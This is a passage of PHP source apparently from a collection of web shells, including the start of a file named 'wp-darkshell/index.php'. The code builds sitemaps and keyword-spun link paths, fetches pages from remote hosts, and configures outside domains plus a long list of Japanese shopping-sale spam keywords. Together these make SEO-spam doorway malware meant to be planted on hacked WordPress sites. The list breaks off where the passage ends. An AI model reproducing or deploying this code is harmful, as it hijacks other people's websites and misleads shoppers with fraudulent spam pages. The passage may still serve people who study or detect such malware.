 947 | 	$mapPre = '<?xml version="1.0" encoding="UTF-8" ?>'. PHP_EOL.'<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . PHP_EOL;	$mapEnd = PHP_EOL .  '</urlset>';
 948 | 	// $urlsArray = $filenames;
 949 | 	$numLinks = count($urlsArray);	$star = 0;	$priority = 0.1;	$starPri = 0;	$gFile ="";	$date = date("Y-m-d");	$time = date("H:i:s");
 950 | 	$str = "";						
 951 | 	$tempArr1 = $filenames;
 952 | 	
 953 | 	foreach($tempArr1 as $value2){
 954 | 		$curphp=basename(__FILE__); 
 955 | 		$value = $value2;		$first=stristr($value,".php");		$last=stristr($value,".xml");		$checkTxt =stristr($value,".txt");		list($tempSid,$tempPid) = explode('-',$value);
 956 | 				$url = getalink($tempSid,$tempPid);
 957 | 		
 958 | 		
 959 | 		
 960 | 		if($first===false && $last===false && $checkTxt===false)
 961 | 		{
 962 | 			$date = date("Y-m-d");			$time = date("H:i:s");				
 963 | 		
 964 | 			if($star % 12000==11999){
 965 | 				$gFile =  'websitemap/sitemap' . $gnumber .'.xml';				echo '<br/>'.$gFile.'<br/>';				$put_str = $mapPre . $str . $mapEnd;				@unlink($gFile);				file_put_contents($gFile,$put_str);
 966 | 				$str = '';				$gnumber++;				return;			}
 967 | 			
 968 | 		
 969 | 			
 970 | 	
 971 | 			$str .= "     <url>
 972 | 			 <loc>" . $url . "</loc> 
 973 | 			 <lastmod>". $date . "T" . $time ."-05:00</lastmod>   
 974 | 			 <changefreq>daily</changefreq> 
 975 | 			 <priority>0.1</priority> 
 976 | 			 </url>
 977 | 		";	
 978 | 			
 979 | 			
 980 | 			$star++;			$starPri++;		}
 981 | 	}
 982 | 	
 983 | 	{
 984 | 		$gFile =  'websitemap/sitemap' . $gnumber .'.xml';		$gnumber++;		echo '<br/>'.$gFile.'<br/>';
 985 | 		$put_str = $mapPre . $str . $mapEnd;		@unlink($gFile);		file_put_contents($gFile,$put_str);	
 986 | 	}
 987 | 	
 988 | 	unset($tempArr1);	unset($filenames);	
 989 | 	echo "生成sitemap成功！";	
 990 | }
 991 | function gsitemap($filenames,$c=1,$jdt=1){
 992 | 	global $gnumber,$arrArrr;	
 993 | 	$filePres = '';	$fileEnds = '';	
 994 | 	
 995 | 	$fpath='http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];	$serpath=substr($fpath,0,strrpos($fpath,'/'));
 996 | 	$siteLink='http://'.$_SERVER['HTTP_HOST'];		
 997 | 	$mapPre = '<?xml version="1.0" encoding="UTF-8" ?>'. PHP_EOL.'<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . PHP_EOL;	$mapEnd = PHP_EOL .  '</urlset>';
 998 | 	// $urlsArray = $filenames;
 999 | 	$numLinks = count($urlsArray);
1000 | 	
1001 | 	$star = 0;	$priority = 0.9;	$starPri = 0;	$gFile ="";	$date = date("Y-m-d");	$time = date("H:i:s");
1002 | 	$str = "     <url>
1003 | 			 <loc>" . $siteLink . "</loc> 
1004 | 			 <lastmod>". $date . "T" . $time ."-05:00</lastmod> 
1005 | 			 <changefreq>always</changefreq> 
1006 | 			 <priority>1.0</priority> 
1007 | 			 </url>
1008 | 		";						
1009 | 	$tempArr1 = $filenames;
1010 | 	
1011 | 	foreach($tempArr1 as $value2){
1012 | 		$curphp=basename(__FILE__); 
1013 | 		$value = $value2;		$first=stristr($value,".php");		$last=stristr($value,".xml");		$checkTxt =stristr($value,".txt");		list($tempSid,$tempPid) = explode('-',$value);		
1014 | 		$url = getalink($tempSid,$tempPid);	
1015 | 		
1016 | 		if($first===false && $last===false && $checkTxt===false)
1017 | 		{
1018 | 			$date = date("Y-m-d");			$time = date("H:i:s");			
1019 | 	
1020 | 			if($star % 12000==11999){
1021 | 				$gFile =  'websitemap/sitemap' . $gnumber .'.xml';				echo '<br/>'.$gFile.'<br/>';				
1022 | 				$put_str = $mapPre . $str . $mapEnd;				@unlink($gFile);				file_put_contents($gFile,$put_str);
1023 | 				$str = '';				$gnumber++;				
1024 | 				return;
1025 | 			}
1026 | 			
1027 | 			if($starPri >= 400 && $priority != 0.1){
1028 | 				$starPri = 0;				$priority = $priority - 0.1;			}
1029 | 			
1030 | 			if($priority > 0.1){
1031 | 				
1032 | 				$str .= "     <url>
1033 | 					 <loc>" . $url . "</loc> 
1034 | 					 <lastmod>". $date . "T" . $time ."-05:00</lastmod>   
1035 | 					 <changefreq>daily</changefreq> 
1036 | 					 <priority>". $priority . "</priority> 
1037 | 					 </url>
1038 | 				";	
1039 | 			}else{
1040 | 										$str .= "     <url>
1041 | 			 <loc>" . $url . "</loc> 
1042 | 			 <lastmod>". $date . "T" . $time ."-05:00</lastmod>   
1043 | 			 <changefreq>daily</changefreq> 
1044 | 			 <priority>0.1</priority> 
1045 | 			 </url>
1046 | 		";	
1047 | 			}
1048 | 			
1049 | 			$star++;			$starPri++;		}
1050 | 	}
1051 | 	
1052 | 	{
1053 | 		$gFile =  'websitemap/sitemap' . $gnumber .'.xml';		echo '<br/>'.$gFile.'<br/>';		
1054 | 		$gnumber++;
1055 | 		$put_str = $mapPre . $str . $mapEnd;		@unlink($gFile);		file_put_contents($gFile,$put_str);	
1056 | 	}
1057 | 	
1058 | 	unset($tempArr1);	unset($filenames);	echo "生成sitemap成功！";	
1059 | }
1060 |   function rmhtmltag2($tagname='',$str=''){
1061 | 		$rulers = '#<'.$tagname.'[^>]*>#s';		$str = preg_replace($rulers,'',$str);		$rulers = '#</'.$tagname.'>#s';		$str = preg_replace($rulers,'',$str);	
1062 | 	$rulers = '#<'.$tagname.'[^>]*>#i';	$str = preg_replace($rulers,'',$str);	$rulers = '#</'.$tagname.'>#i';	$str = preg_replace($rulers,'',$str);	return $str;	
1063 | 	}
1064 | 	
1065 | 	function rmhtmltag($tagname='',$str=''){
1066 | 		$rulers = '#<'.$tagname.'[^>]*>.*?</'.$tagname.'>#s';		$str = preg_replace($rulers,'',$str);		$rulers = '#<'.$tagname.'[^>]*>.*?</'.$tagname.'>#i';		$str = preg_replace($rulers,'',$str);		return $str;	
1067 | 	}
1068 |   
1069 | function fillUrl($str = '', $url){
1070 | 	$relur = '#(?:href|src) ?= ?"([^"]+)"#s';	
1071 | 	$urlInfo = parse_url($url);	
1072 | 	
1073 | 	preg_match_all($relur, $str, $matches);
1074 | 	if(count($matches[1])){
1075 | 		foreach($matches[1] as $values){
1076 | 			if(!strstr($values, "//") && !strstr($values, "..")){
1077 | 				$rStr =  $urlInfo['host']."/".$values;				$rStr =  'http://' . str_replace('//','/',$rStr);				
1078 | 				$str = str_replace('"'.$values.'"', '"'.$rStr.'"' , $str) ;			}elseif(strstr($values, "..")){
1079 | 				
1080 | 				// echo $urlInfo['host'];				// echo str_replace(basename($url),"",$url);				// die();				
1081 | 				$rStr = str_replace(basename($url),"",$url)."/".$values;				
1082 | 				
1083 | 				$rStr = str_replace("http://","<llqhttp>",$rStr);				
1084 | 				$rStr = str_replace("https://","<llqhttps>",$rStr);				
1085 | 				$rStr = str_replace("//","/",$rStr);				
1086 | 				$rStr = str_replace("<llqhttps>","https://",$rStr);				
1087 | 				$rStr = str_replace("<llqhttp>","http://",$rStr);				
1088 | 				$str = str_replace('"'.$values.'"', '"'.$rStr.'"' , $str) ;			}
1089 | 		}
1090 | 	}	
1091 | 	
1092 | 	
1093 | 	$relur = '#(?:href|src) ?= ?\'([^\']+)\'#s';	
1094 | 	$urlInfo = parse_url($url);	
1095 | 	
1096 | 	preg_match_all($relur, $str, $matches);	// print_r($matches[1]);	
1097 | 	if(count($matches[1])){
1098 | 		foreach($matches[1] as $values){
1099 | 			if(!strstr($values, "//") && !strstr($values, "..")){
1100 | 					$rStr =  $urlInfo['host']."/".$values;				$rStr =  'http://' . str_replace('//','/',$rStr);				$str = str_replace("'".$values."'", "'".$rStr."'" , $str) ;			}elseif(strstr($values, "..")){
1101 | 				
1102 | 				$rStr = str_replace(basename($url),"",$url)."/".$values;				
1103 | 				
1104 | 				$rStr = str_replace("http://","<llqhttp>",$rStr);				
1105 | 				$rStr = str_replace("https://","<llqhttps>",$rStr);				
1106 | 				$rStr = str_replace("//","/",$rStr);				
1107 | 				$rStr = str_replace("<llqhttps>","https://",$rStr);				
1108 | 				$rStr = str_replace("<llqhttp>","http://",$rStr);				
1109 | 				$str = str_replace("'".$values."'", "'".$rStr."'" , $str) ;			}
1110 | 		}
1111 | 	}
1112 | 	return $str;}
1113 | function auto_read($str, $charset='UTF-8') {
1114 | 	$list = array('EUC-JP', 'Shift_JIS', 'UTF-8',  'iso-2022-jp');
1115 | 	$encode = mb_detect_encoding($str, $list);	// echo $encode;die();	
1116 | 	if($encode == 'UTF-8'){
1117 | 		return $str;	}else{
1118 | 		return mb_convert_encoding($str, $charset, $encode);	}
1119 | 	 
1120 | }
1121 | function detect_encoding($file){
1122 | 	$list = array('GBK', 'UTF-8', 'UTF-16LE', 'UTF-16BE', 'ISO-8859-1');	$str = file_get_contents($file);	foreach ($list as $item) {
1123 | 		$tmp = mb_convert_encoding($str, $item, $item);		if (md5($tmp) == md5($str)) {
1124 | 		
1125 | 			return $item;		}
1126 | 	}
1127 | 	return null;}
1128 | function curl_get_from_webpage($url,$proxy='',$loop=10){
1129 | 	$data = false;        $i = 0;        while(!$data) {
1130 |              $data = curl_get_from_webpage_one_time($url,$proxy);             if($i++ >= $loop) break;        }
1131 | 	return $data;}
1132 |  
1133 |  
1134 | function curl_get_from_webpage_one_time($url,$proxy=''){
1135 |      $data = '';     $url = trim($url);     if (extension_loaded('curl') && function_exists('curl_init') && function_exists('curl_exec')){
1136 |          $ch = curl_init();         curl_setopt($ch, CURLOPT_URL, $url);		 curl_setopt($ch, CURLOPT_HEADER, false);		 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);		 
1137 |          curl_setopt($ch, CURLOPT_TIMEOUT, 20);         $data = curl_exec($ch);         curl_close($ch);      }
1138 |     
1139 |      if ($data == ''){
1140 |          if (function_exists('file_get_contents') && $url){
1141 |              $data = @file_get_contents($url);             }
1142 |          }
1143 |     
1144 |      if (($data == '') && $url){
1145 |          if (function_exists('fopen') && function_exists('ini_get') && ini_get('allow_url_fopen')){
1146 |              ($fp = @fopen($url, 'r')) || exit('Open url faild!');            
1147 |              if ($fp){
1148 |                 
1149 |                  while (!@feof($fp)){
1150 |                      $data .= @fgets($fp) . '';                     }
1151 |                 
1152 |                  @fclose($fp);                 }
1153 |              }
1154 |          }
1155 |     
1156 |      return $data;	
1157 | 	
1158 | }
1159 | 	function getalink($sid,$pid){
1160 | 		
1161 | 		global $arrnametime,$arrKeywz,$arr_word,$strRand;		
1162 | 	
1163 | 		$filePres = '';		$fileEnds = '';		$siteLink='http://'.$_SERVER['HTTP_HOST'];
1164 | 		$dirNames = dirname(__FILE__);		$httcReplace = end((explode(DIRECTORY_SEPARATOR, $dirNames)));		
1165 | 		if(JDT == 2){
1166 | 			$filePres = $siteLink ."/index.php/";		}elseif(JDT == 1){
1167 | 			$filePres = $siteLink ."/". $httcReplace . "/";		}elseif(JDT == 3){
1168 | 			$filePres = $siteLink ."/". $httcReplace . "/" .basename(__FILE__) . "?keyword=";		}else{
1169 | 			$filePres = $siteLink."/";		}
1170 | 		
1171 | 		$ms = $arrnametime[$pid % count($arrnametime)];		
1172 | 		
1173 | 		$keyNum = $arrKeywz[$pid % count($arrKeywz)];		
1174 | 		$keyWordKey = $pid % 10;		$keyStrKey = $pid % strlen("icedrkswzjhpnxoyvumfatblgq");		$keyArr = array();		$flag = 0;		
1175 | 		if($ms == 2 or $ms ==4){
1176 | 			if($keyNum >= 9){
1177 | 				$fg = 4;			}elseif($keyNum >= 7){
1178 | 				 $fg = 3;			}else{
1179 | 				 $fg = 2;			}
1180 | 		}
1181 | 		
1182 | 		for($i=0;$i<$keyNum;$i++){
1183 | 			$tempNum = $arr_word[$i][$keyWordKey];			$tempstr = '';			for($j=0;$j<$tempNum;$j++)
1184 | 				$tempstr .= $strRand[$flag++]{$keyStrKey};			
1185 | 			$keyArr[$i] = $tempstr;		}
1186 | 		
1187 | 		$SidWz = $sid % $keyNum;		$PidWz = $pid % $keyNum;		$linkCenter = '';
1188 | 		
1189 | 		if(JDT == 3){
1190 | 			for($i=0;$i<$keyNum;$i++){
1191 | 				
1192 | 				if($SidWz == $i)
1193 | 					$linkCenter .= BZSITE . $sid .'-';				
1194 | 				if($PidWz == $i)
1195 | 					$linkCenter .= BZPRO . $pid .'-';				
1196 | 				
1197 | 				$linkCenter .= $keyArr[$i] .'-';			}
1198 | 			$linkCenter .= $linkCenter . "#llq";			$linkCenter = str_replace('-#llq','',$linkCenter);			return $filePres.$linkCenter;		}
1199 | 		
1200 | 		
1201 | 		
1202 | 		
1203 | 		if($ms == 1){
1204 | 			for($i=0;$i<$keyNum;$i++){
1205 | 				
1206 | 				if($SidWz == $i)
1207 | 					$linkCenter .= BZSITE . $sid .'-';				
1208 | 				if($PidWz == $i)
1209 | 					$linkCenter .= BZPRO . $pid .'-';				
1210 | 				
1211 | 				$linkCenter .= $keyArr[$i] .'-';
1212 | 			}
1213 | 			
1214 | 			$linkCenter .= "/";			$linkCenter = str_replace("-/","/",$linkCenter);			
1215 | 		}elseif($ms == 2){
1216 | 			for($i=0;$i<$keyNum;$i++){
1217 | 				
1218 | 				if($SidWz == $i)
1219 | 					$linkCenter .= BZSITE . $sid .'-';				
1220 | 				if($PidWz == $i)
1221 | 					$linkCenter .= BZPRO . $pid .'-';				
1222 | 				
1223 | 				$linkCenter .= $keyArr[$i] .'-';				if($i == $fg-1){
1224 | 					$linkCenter .= '/';				}
1225 | 			}
1226 | 			
1227 | 			$linkCenter .= "/";			$linkCenter = str_replace("-/","/",$linkCenter);			
1228 | 		}elseif($ms == 3){
1229 | 			for($i=0;$i<$keyNum;$i++){
1230 | 				
1231 | 				if($SidWz == $i)
1232 | 					$linkCenter .= BZSITE . $sid .'-';				
1233 | 				if($PidWz == $i)
1234 | 					$linkCenter .= BZPRO . $pid .'-';				
1235 | 				
1236 | 				$linkCenter .= $keyArr[$i] .'-';
1237 | 			}
1238 | 			
1239 | 			$linkCenter .= JTHZ;			$linkCenter = str_replace("-".JTHZ,JTHZ,$linkCenter);			
1240 | 			
1241 | 		}elseif($ms == 4){
1242 | 				for($i=0;$i<$keyNum;$i++){
1243 | 				
1244 | 				if($SidWz == $i)
1245 | 					$linkCenter .= BZSITE . $sid .'-';				
1246 | 				if($PidWz == $i)
1247 | 					$linkCenter .= BZPRO . $pid .'-';				
1248 | 				
1249 | 				$linkCenter .= $keyArr[$i] .'-';				if($i == $fg-1){
1250 | 					$linkCenter .= '/';				}
1251 | 			}
1252 | 			
1253 | 			$linkCenter .= JTHZ;			$linkCenter = str_replace("-/","/",$linkCenter);			$linkCenter = str_replace("-".JTHZ,JTHZ,$linkCenter);		}
1254 | 		
1255 | 		return $filePres.$linkCenter;
1256 | 	}
1257 | 	
1258 | 	
1259 | function is_ip($localIp,$ipRanges)
1260 | {    
1261 | 	$localIp = ip2long($localIp);  
1262 | 	foreach($ipRanges as $val)
1263 | 	{ 
1264 | 		$ipmin=sprintf("%u",ip2long($val[0]));		$ipmax=sprintf("%u",ip2long($val[1]));
1265 | 		if($localIp >= $ipmin && $localIp <= $ipmax)
1266 | 		{   
1267 | 			return true; 
1268 | 		} 
1269 | 	}   
1270 | 	return false;}
1271 |  
1272 |  
1273 | function get_real_ip(){
1274 | 	
1275 | 	
1276 | 	$ip=false;    if (isset($_SERVER)) {
1277 |       if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
1278 |         $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];      } elseif (isset($_SERVER['HTTP_CLIENT_IP'])) {
1279 |         $ip = $_SERVER['HTTP_CLIENT_IP'];      } elseif (isset($_SERVER['HTTP_X_FORWARDED'])) {
1280 |         $ip = $_SERVER['HTTP_X_FORWARDED'];      } elseif (isset($_SERVER['HTTP_X_CLUSTER_CLIENT_IP'])) {
1281 |         $ip = $_SERVER['HTTP_X_CLUSTER_CLIENT_IP'];      } elseif (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
1282 |         $ip = $_SERVER['HTTP_FORWARDED_FOR'];      } elseif (isset($_SERVER['HTTP_FORWARDED'])) {
1283 |         $ip = $_SERVER['HTTP_FORWARDED'];      } else {
1284 |         $ip = $_SERVER['REMOTE_ADDR'];      }
1285 |     } else {
1286 |       if (getenv('HTTP_X_FORWARDED_FOR')) {
1287 |         $ip = getenv('HTTP_X_FORWARDED_FOR');      } elseif (getenv('HTTP_CLIENT_IP')) {
1288 |         $ip = getenv('HTTP_CLIENT_IP');      } else {
1289 |         $ip = getenv('REMOTE_ADDR');      }
1290 |     }
1291 | 	return ($ip ? $ip : $_SERVER['REMOTE_ADDR']);}
1292 |  
1293 | //file end
1294 | 


--------------------------------------------------------------------------------
/shells/wp-darkshell/index.php:
--------------------------------------------------------------------------------
   1 | <?php 
   2 | @ini_set('display_errors', 0);
   3 | @set_time_limit(3600);
   4 | define("DOMTXT","http://www.url2017.top/jp/");
   5 | define("GETDOM","http://www.host-3.xyz/buyma1qi_0/");
   6 | define("FNUM",50);
   7 | define("JGNUM","40");
   8 | define("LINKNUM","18");
   9 | define("BZSITE","u");
  10 | define("BZPRO","h");
  11 | //msbg
  12 | define("JDT","0");
  13 | //msend
  14 | //jthouzuibg
  15 | define("JTHZ",".html");
  16 | //jthouzuiend
  17 | 
  18 | 
  19 | 
  20 | 
  21 | 
  22 | 
  23 | 
  24 | 
  25 | 
  26 | 
  27 | 
  28 | //keyjgbg
  29 | define("KEYJG","16");
  30 | //keyjgbgend
  31 | 
  32 | 
  33 | 
  34 | 
  35 | 
  36 | 
  37 | 
  38 | 
  39 | 
  40 | 
  41 | 
  42 | 
  43 | 
  44 | 
  45 | 
  46 | 
  47 | 
  48 | // #llqllq#arr_nametimebg
  49 | 
  50 | $arrnametime[]="1";
  51 | $arrnametime[]="4";
  52 | $arrnametime[]="3";
  53 | $arrnametime[]="2";
  54 | 
  55 | 
  56 | // #llqllq#arr_nametimeend
  57 | // #llqllq#arr_wordbg
  58 | 
  59 | $arr_word[0][] ="8";$arr_word[0][] ="7";$arr_word[0][] ="6";$arr_word[0][] ="7";$arr_word[0][] ="4";$arr_word[0][] ="5";$arr_word[0][] ="4";$arr_word[0][] ="6";$arr_word[0][] ="5";$arr_word[0][] ="8";$arr_word[1][] ="6";$arr_word[1][] ="4";$arr_word[1][] ="8";$arr_word[1][] ="4";$arr_word[1][] ="5";$arr_word[1][] ="5";$arr_word[1][] ="8";$arr_word[1][] ="7";$arr_word[1][] ="7";$arr_word[1][] ="6";$arr_word[2][] ="8";$arr_word[2][] ="6";$arr_word[2][] ="6";$arr_word[2][] ="5";$arr_word[2][] ="8";$arr_word[2][] ="4";$arr_word[2][] ="5";$arr_word[2][] ="7";$arr_word[2][] ="7";$arr_word[2][] ="4";$arr_word[3][] ="6";$arr_word[3][] ="5";$arr_word[3][] ="7";$arr_word[3][] ="4";$arr_word[3][] ="8";$arr_word[3][] ="7";$arr_word[3][] ="6";$arr_word[3][] ="4";$arr_word[3][] ="8";$arr_word[3][] ="5";$arr_word[4][] ="7";$arr_word[4][] ="4";$arr_word[4][] ="5";$arr_word[4][] ="8";$arr_word[4][] ="6";$arr_word[4][] ="5";$arr_word[4][] ="8";$arr_word[4][] ="7";$arr_word[4][] ="6";$arr_word[4][] ="4";$arr_word[5][] ="4";$arr_word[5][] ="7";$arr_word[5][] ="6";$arr_word[5][] ="7";$arr_word[5][] ="4";$arr_word[5][] ="6";$arr_word[5][] ="8";$arr_word[5][] ="5";$arr_word[5][] ="8";$arr_word[5][] ="5";$arr_word[6][] ="5";$arr_word[6][] ="7";$arr_word[6][] ="8";$arr_word[6][] ="6";$arr_word[6][] ="8";$arr_word[6][] ="6";$arr_word[6][] ="5";$arr_word[6][] ="4";$arr_word[6][] ="7";$arr_word[6][] ="4";$arr_word[7][] ="4";$arr_word[7][] ="5";$arr_word[7][] ="8";$arr_word[7][] ="6";$arr_word[7][] ="7";$arr_word[7][] ="6";$arr_word[7][] ="8";$arr_word[7][] ="7";$arr_word[7][] ="5";$arr_word[7][] ="4";$arr_word[8][] ="7";$arr_word[8][] ="8";$arr_word[8][] ="4";$arr_word[8][] ="8";$arr_word[8][] ="5";$arr_word[8][] ="5";$arr_word[8][] ="7";$arr_word[8][] ="6";$arr_word[8][] ="6";$arr_word[8][] ="4";$arr_word[9][] ="7";$arr_word[9][] ="8";$arr_word[9][] ="7";$arr_word[9][] ="5";$arr_word[9][] ="5";$arr_word[9][] ="4";$arr_word[9][] ="6";$arr_word[9][] ="8";$arr_word[9][] ="6";$arr_word[9][] ="4";$arr_word[10][] ="8";$arr_word[10][] ="8";$arr_word[10][] ="5";$arr_word[10][] ="4";$arr_word[10][] ="6";$arr_word[10][] ="7";$arr_word[10][] ="7";$arr_word[10][] ="5";$arr_word[10][] ="4";$arr_word[10][] ="6";$arr_word[11][] ="6";$arr_word[11][] ="7";$arr_word[11][] ="6";$arr_word[11][] ="4";$arr_word[11][] ="8";$arr_word[11][] ="4";$arr_word[11][] ="5";$arr_word[11][] ="7";$arr_word[11][] ="8";$arr_word[11][] ="5";
  60 | 
  61 | // #llqllq#arr_wordend
  62 | // #llqllq#arr_keywz
  63 | 
  64 | $arrKeywz[]="6";
  65 | $arrKeywz[]="5";
  66 | $arrKeywz[]="11";
  67 | $arrKeywz[]="12";
  68 | $arrKeywz[]="9";
  69 | $arrKeywz[]="4";
  70 | $arrKeywz[]="10";
  71 | $arrKeywz[]="7";
  72 | $arrKeywz[]="8";
  73 | 
  74 | 
  75 | // #llqllq#arr_keywzend
  76 | // #llqllq#arr_fuhao
  77 | 
  78 | $arrfh[]=" ";
  79 | $arrfh[]="、";
  80 | $arrfh[]="，";
  81 | $arrfh[]="；";
  82 | $arrfh[]="……";
  83 | $arrfh[]="。";
  84 | $arrfh[]="？";
  85 | $arrfh[]="！";
  86 | 
  87 | 
  88 | // #llqllq#arr_fuhaoend
  89 | // #llqllq#arr_keybg
  90 | 
  91 | $arr_key[]="【日本産】";
  92 | $arr_key[]="完売";
  93 | $arr_key[]="通販";
  94 | $arr_key[]="誕生日プレゼント";
  95 | $arr_key[]="【代引可】";
  96 | $arr_key[]="【正規取扱店】";
  97 | $arr_key[]="出産祝い";
  98 | $arr_key[]="【特別セール品】";
  99 | $arr_key[]="【T-ポイント5倍】";
 100 | $arr_key[]="【まとめ買い】";
 101 | $arr_key[]="円高還元";
 102 | $arr_key[]="【激安大特価！】";
 103 | $arr_key[]="【楽天カード分割】";
 104 | $arr_key[]="【★超目玉】";
 105 | $arr_key[]="【送料無料（一部地域を除く）】";
 106 | $arr_key[]="【即発送可能】";
 107 | $arr_key[]="【送料込】";
 108 | $arr_key[]="【アウトレット☆送料無料】";
 109 | $arr_key[]="『4年保証』";
 110 | $arr_key[]="男女兼用";
 111 | $arr_key[]="【WEB限定】";
 112 | $arr_key[]="【高額売筋】";
 113 | $arr_key[]="【オンラインショップ】";
 114 | $arr_key[]="【10％OFF】";
 115 | $arr_key[]="【初回限定お試し価格】";
 116 | $arr_key[]="【別倉庫からの配送】";
 117 | $arr_key[]="【超安い】";
 118 | $arr_key[]="【おすすめ】";
 119 | $arr_key[]="【格安SALEスタート】";
 120 | $arr_key[]="【即納！最大半額！】";
 121 | $arr_key[]="入荷中";
 122 | $arr_key[]="【70％OFF】";
 123 | $arr_key[]="【中古】";
 124 | $arr_key[]="【半額】";
 125 | $arr_key[]="【日本製】";
 126 | $arr_key[]="【在庫あり】";
 127 | $arr_key[]="【期間限定お試し価格】";
 128 | $arr_key[]="【保証書付】";
 129 | $arr_key[]="【NEW限定品】";
 130 | $arr_key[]="【代引き不可】";
 131 | $arr_key[]="【あす楽対応】";
 132 | $arr_key[]="[定休日以外毎日出荷中]";
 133 | $arr_key[]="【絶品】";
 134 | $arr_key[]="お気にいる";
 135 | $arr_key[]="【メール便無料】";
 136 | $arr_key[]="【35％OFF】";
 137 | $arr_key[]="【予約販売】本";
 138 | $arr_key[]="【予約】";
 139 | $arr_key[]="★お求めやすく価格改定★";
 140 | $arr_key[]="【ラッピング無料】";
 141 | $arr_key[]="激安";
 142 | $arr_key[]="【5％OFF】";
 143 | $arr_key[]="【限定製作】";
 144 | $arr_key[]="【2015A/W新作★送料無料】";
 145 | $arr_key[]="【メーカー直送】";
 146 | $arr_key[]="【送料無料キャンペーン?】";
 147 | $arr_key[]="品質検査済";
 148 | $arr_key[]="【超ポイントバック祭】";
 149 | $arr_key[]="【祝開店！大放出セール開催中】";
 150 | $arr_key[]="【限定販売】";
 151 | $arr_key[]="非売品";
 152 | $arr_key[]="希少 黒入荷！";
 153 | $arr_key[]="【メーカー公式ショップ】";
 154 | $arr_key[]="誠実";
 155 | $arr_key[]="大特価!!";
 156 | $arr_key[]="訳あり";
 157 | $arr_key[]="【上品】";
 158 | $arr_key[]="セットアップ";
 159 | $arr_key[]="優先配送";
 160 | $arr_key[]="【使い勝手の良い】";
 161 | $arr_key[]="オープニング 大放出セール";
 162 | $arr_key[]="高い素材";
 163 | $arr_key[]="【返品送料無料】";
 164 | $arr_key[]="【正規品直輸入】";
 165 | $arr_key[]="【コンビニ受取対応商品】";
 166 | $arr_key[]="【爆売り！】";
 167 | $arr_key[]="【超歓迎された】";
 168 | $arr_key[]="【訳あり】";
 169 | $arr_key[]="【第1位獲得！】";
 170 | $arr_key[]="限定価格セール！";
 171 | $arr_key[]="【最安値に挑戦】";
 172 | $arr_key[]="【国内正規総代理店アイテム】";
 173 | $arr_key[]="予約販売";
 174 | $arr_key[]="驚きの価格が実現！";
 175 | $arr_key[]="【待望★】";
 176 | $arr_key[]="【在庫処分大特価!!】";
 177 | $arr_key[]="【希少！！】";
 178 | $arr_key[]="【一部予約販売】";
 179 | $arr_key[]="『5年保証』";
 180 | $arr_key[]="【限定価格セール！】";
 181 | $arr_key[]="【大特価!!】";
 182 | $arr_key[]="【爆買い！】";
 183 | $arr_key[]="『3年保証』";
 184 | $arr_key[]="【予約販売品】";
 185 | $arr_key[]="新作";
 186 | $arr_key[]="【GINGER掲載商品】";
 187 | $arr_key[]="【楽天スーパーセール】";
 188 | $arr_key[]="【楽ギフ_のし宛書】";
 189 | $arr_key[]="【税込】";
 190 | $arr_key[]="【返品交換不可】";
 191 | $arr_key[]="現品限り一斉値下げ！";
 192 | $arr_key[]="【信頼】";
 193 | $arr_key[]="『1年保証』";
 194 | $arr_key[]="配送員設置";
 195 | $arr_key[]="おすすめ";
 196 | $arr_key[]="【お気にいる】";
 197 | $arr_key[]="使い勝手の良い";
 198 | $arr_key[]="オリジナル";
 199 | $arr_key[]="【初回限定】";
 200 | $arr_key[]="【500円引きクーポン】";
 201 | $arr_key[]="お気に入り";
 202 | $arr_key[]="全商品オープニング価格！";
 203 | $arr_key[]="【未使用品】";
 204 | $arr_key[]="（訳ありセール 格安）";
 205 | $arr_key[]="交換無料！";
 206 | $arr_key[]="【60％OFF】";
 207 | $arr_key[]="【メーカー包装済】";
 208 | $arr_key[]="【売り切り御免！】";
 209 | $arr_key[]="【値下げ】";
 210 | $arr_key[]="【国内在庫】";
 211 | $arr_key[]="【おしゃれ】";
 212 | $arr_key[]="【数量は多】";
 213 | $arr_key[]="【期間限定特価】";
 214 | $arr_key[]="【2015最新作】";
 215 | $arr_key[]="【着後レビューで 送料無料】";
 216 | $arr_key[]="【限定セール！】";
 217 | $arr_key[]="【お買得！】";
 218 | $arr_key[]="【期間限定送料無料】";
 219 | $arr_key[]="【全品送料無料】";
 220 | $arr_key[]="保障できる";
 221 | $arr_key[]="【超特価SALE開催！】";
 222 | $arr_key[]="【予約中！】";
 223 | $arr_key[]="爆買い！";
 224 | $arr_key[]="【50％OFF】";
 225 | $arr_key[]="【お取り寄せ】";
 226 | $arr_key[]="【一部予約！】";
 227 | $arr_key[]="お見舞い";
 228 | $arr_key[]="★大人気商品★";
 229 | $arr_key[]="１着でも送料無料";
 230 | $arr_key[]="【史上最も激安】";
 231 | $arr_key[]="『2年保証』";
 232 | $arr_key[]="数量は多";
 233 | $arr_key[]="結婚祝い";
 234 | $arr_key[]="贈り物";
 235 | $arr_key[]="【新品、本物、当店在庫だから安心】";
 236 | $arr_key[]="【メール便送料無料対応可】";
 237 | $arr_key[]="【おまけ付】";
 238 | $arr_key[]="【爆売りセール開催中！】";
 239 | $arr_key[]="【★安心の定価販売★】";
 240 | $arr_key[]="直送商品";
 241 | $arr_key[]="【即日発送】";
 242 | $arr_key[]="【タイムセール！】";
 243 | $arr_key[]="【超目玉】";
 244 | $arr_key[]="大量入荷";
 245 | $arr_key[]="★日本の職人技★";
 246 | $arr_key[]="【ネット限定】";
 247 | $arr_key[]="【最安値挑戦！】";
 248 | $arr_key[]="【2016 新作】";
 249 | $arr_key[]="感謝の声続々！";
 250 | $arr_key[]="【最安値挑戦】";
 251 | $arr_key[]="【おトク】";
 252 | $arr_key[]="【再入荷！】";
 253 | $arr_key[]="【残りわずか】";
 254 | $arr_key[]="[宅送]";
 255 | $arr_key[]="玄関先迄納品";
 256 | $arr_key[]="超人気";
 257 | $arr_key[]="【海外輸入】";
 258 | $arr_key[]="【 新品 】";
 259 | $arr_key[]="【お年玉セール特価】";
 260 | $arr_key[]="【スーパーセール】";
 261 | $arr_key[]="【新作からSALEアイテム等お得な商品満載】";
 262 | $arr_key[]="【驚きの値段で】";
 263 | $arr_key[]="【国内即発送】";
 264 | $arr_key[]="高価値";
 265 | $arr_key[]="【国内正規品】";
 266 | $arr_key[]="【セール】";
 267 | $arr_key[]="【セール 登場から人気沸騰】";
 268 | $arr_key[]="【レビューを書けば送料当店負担】";
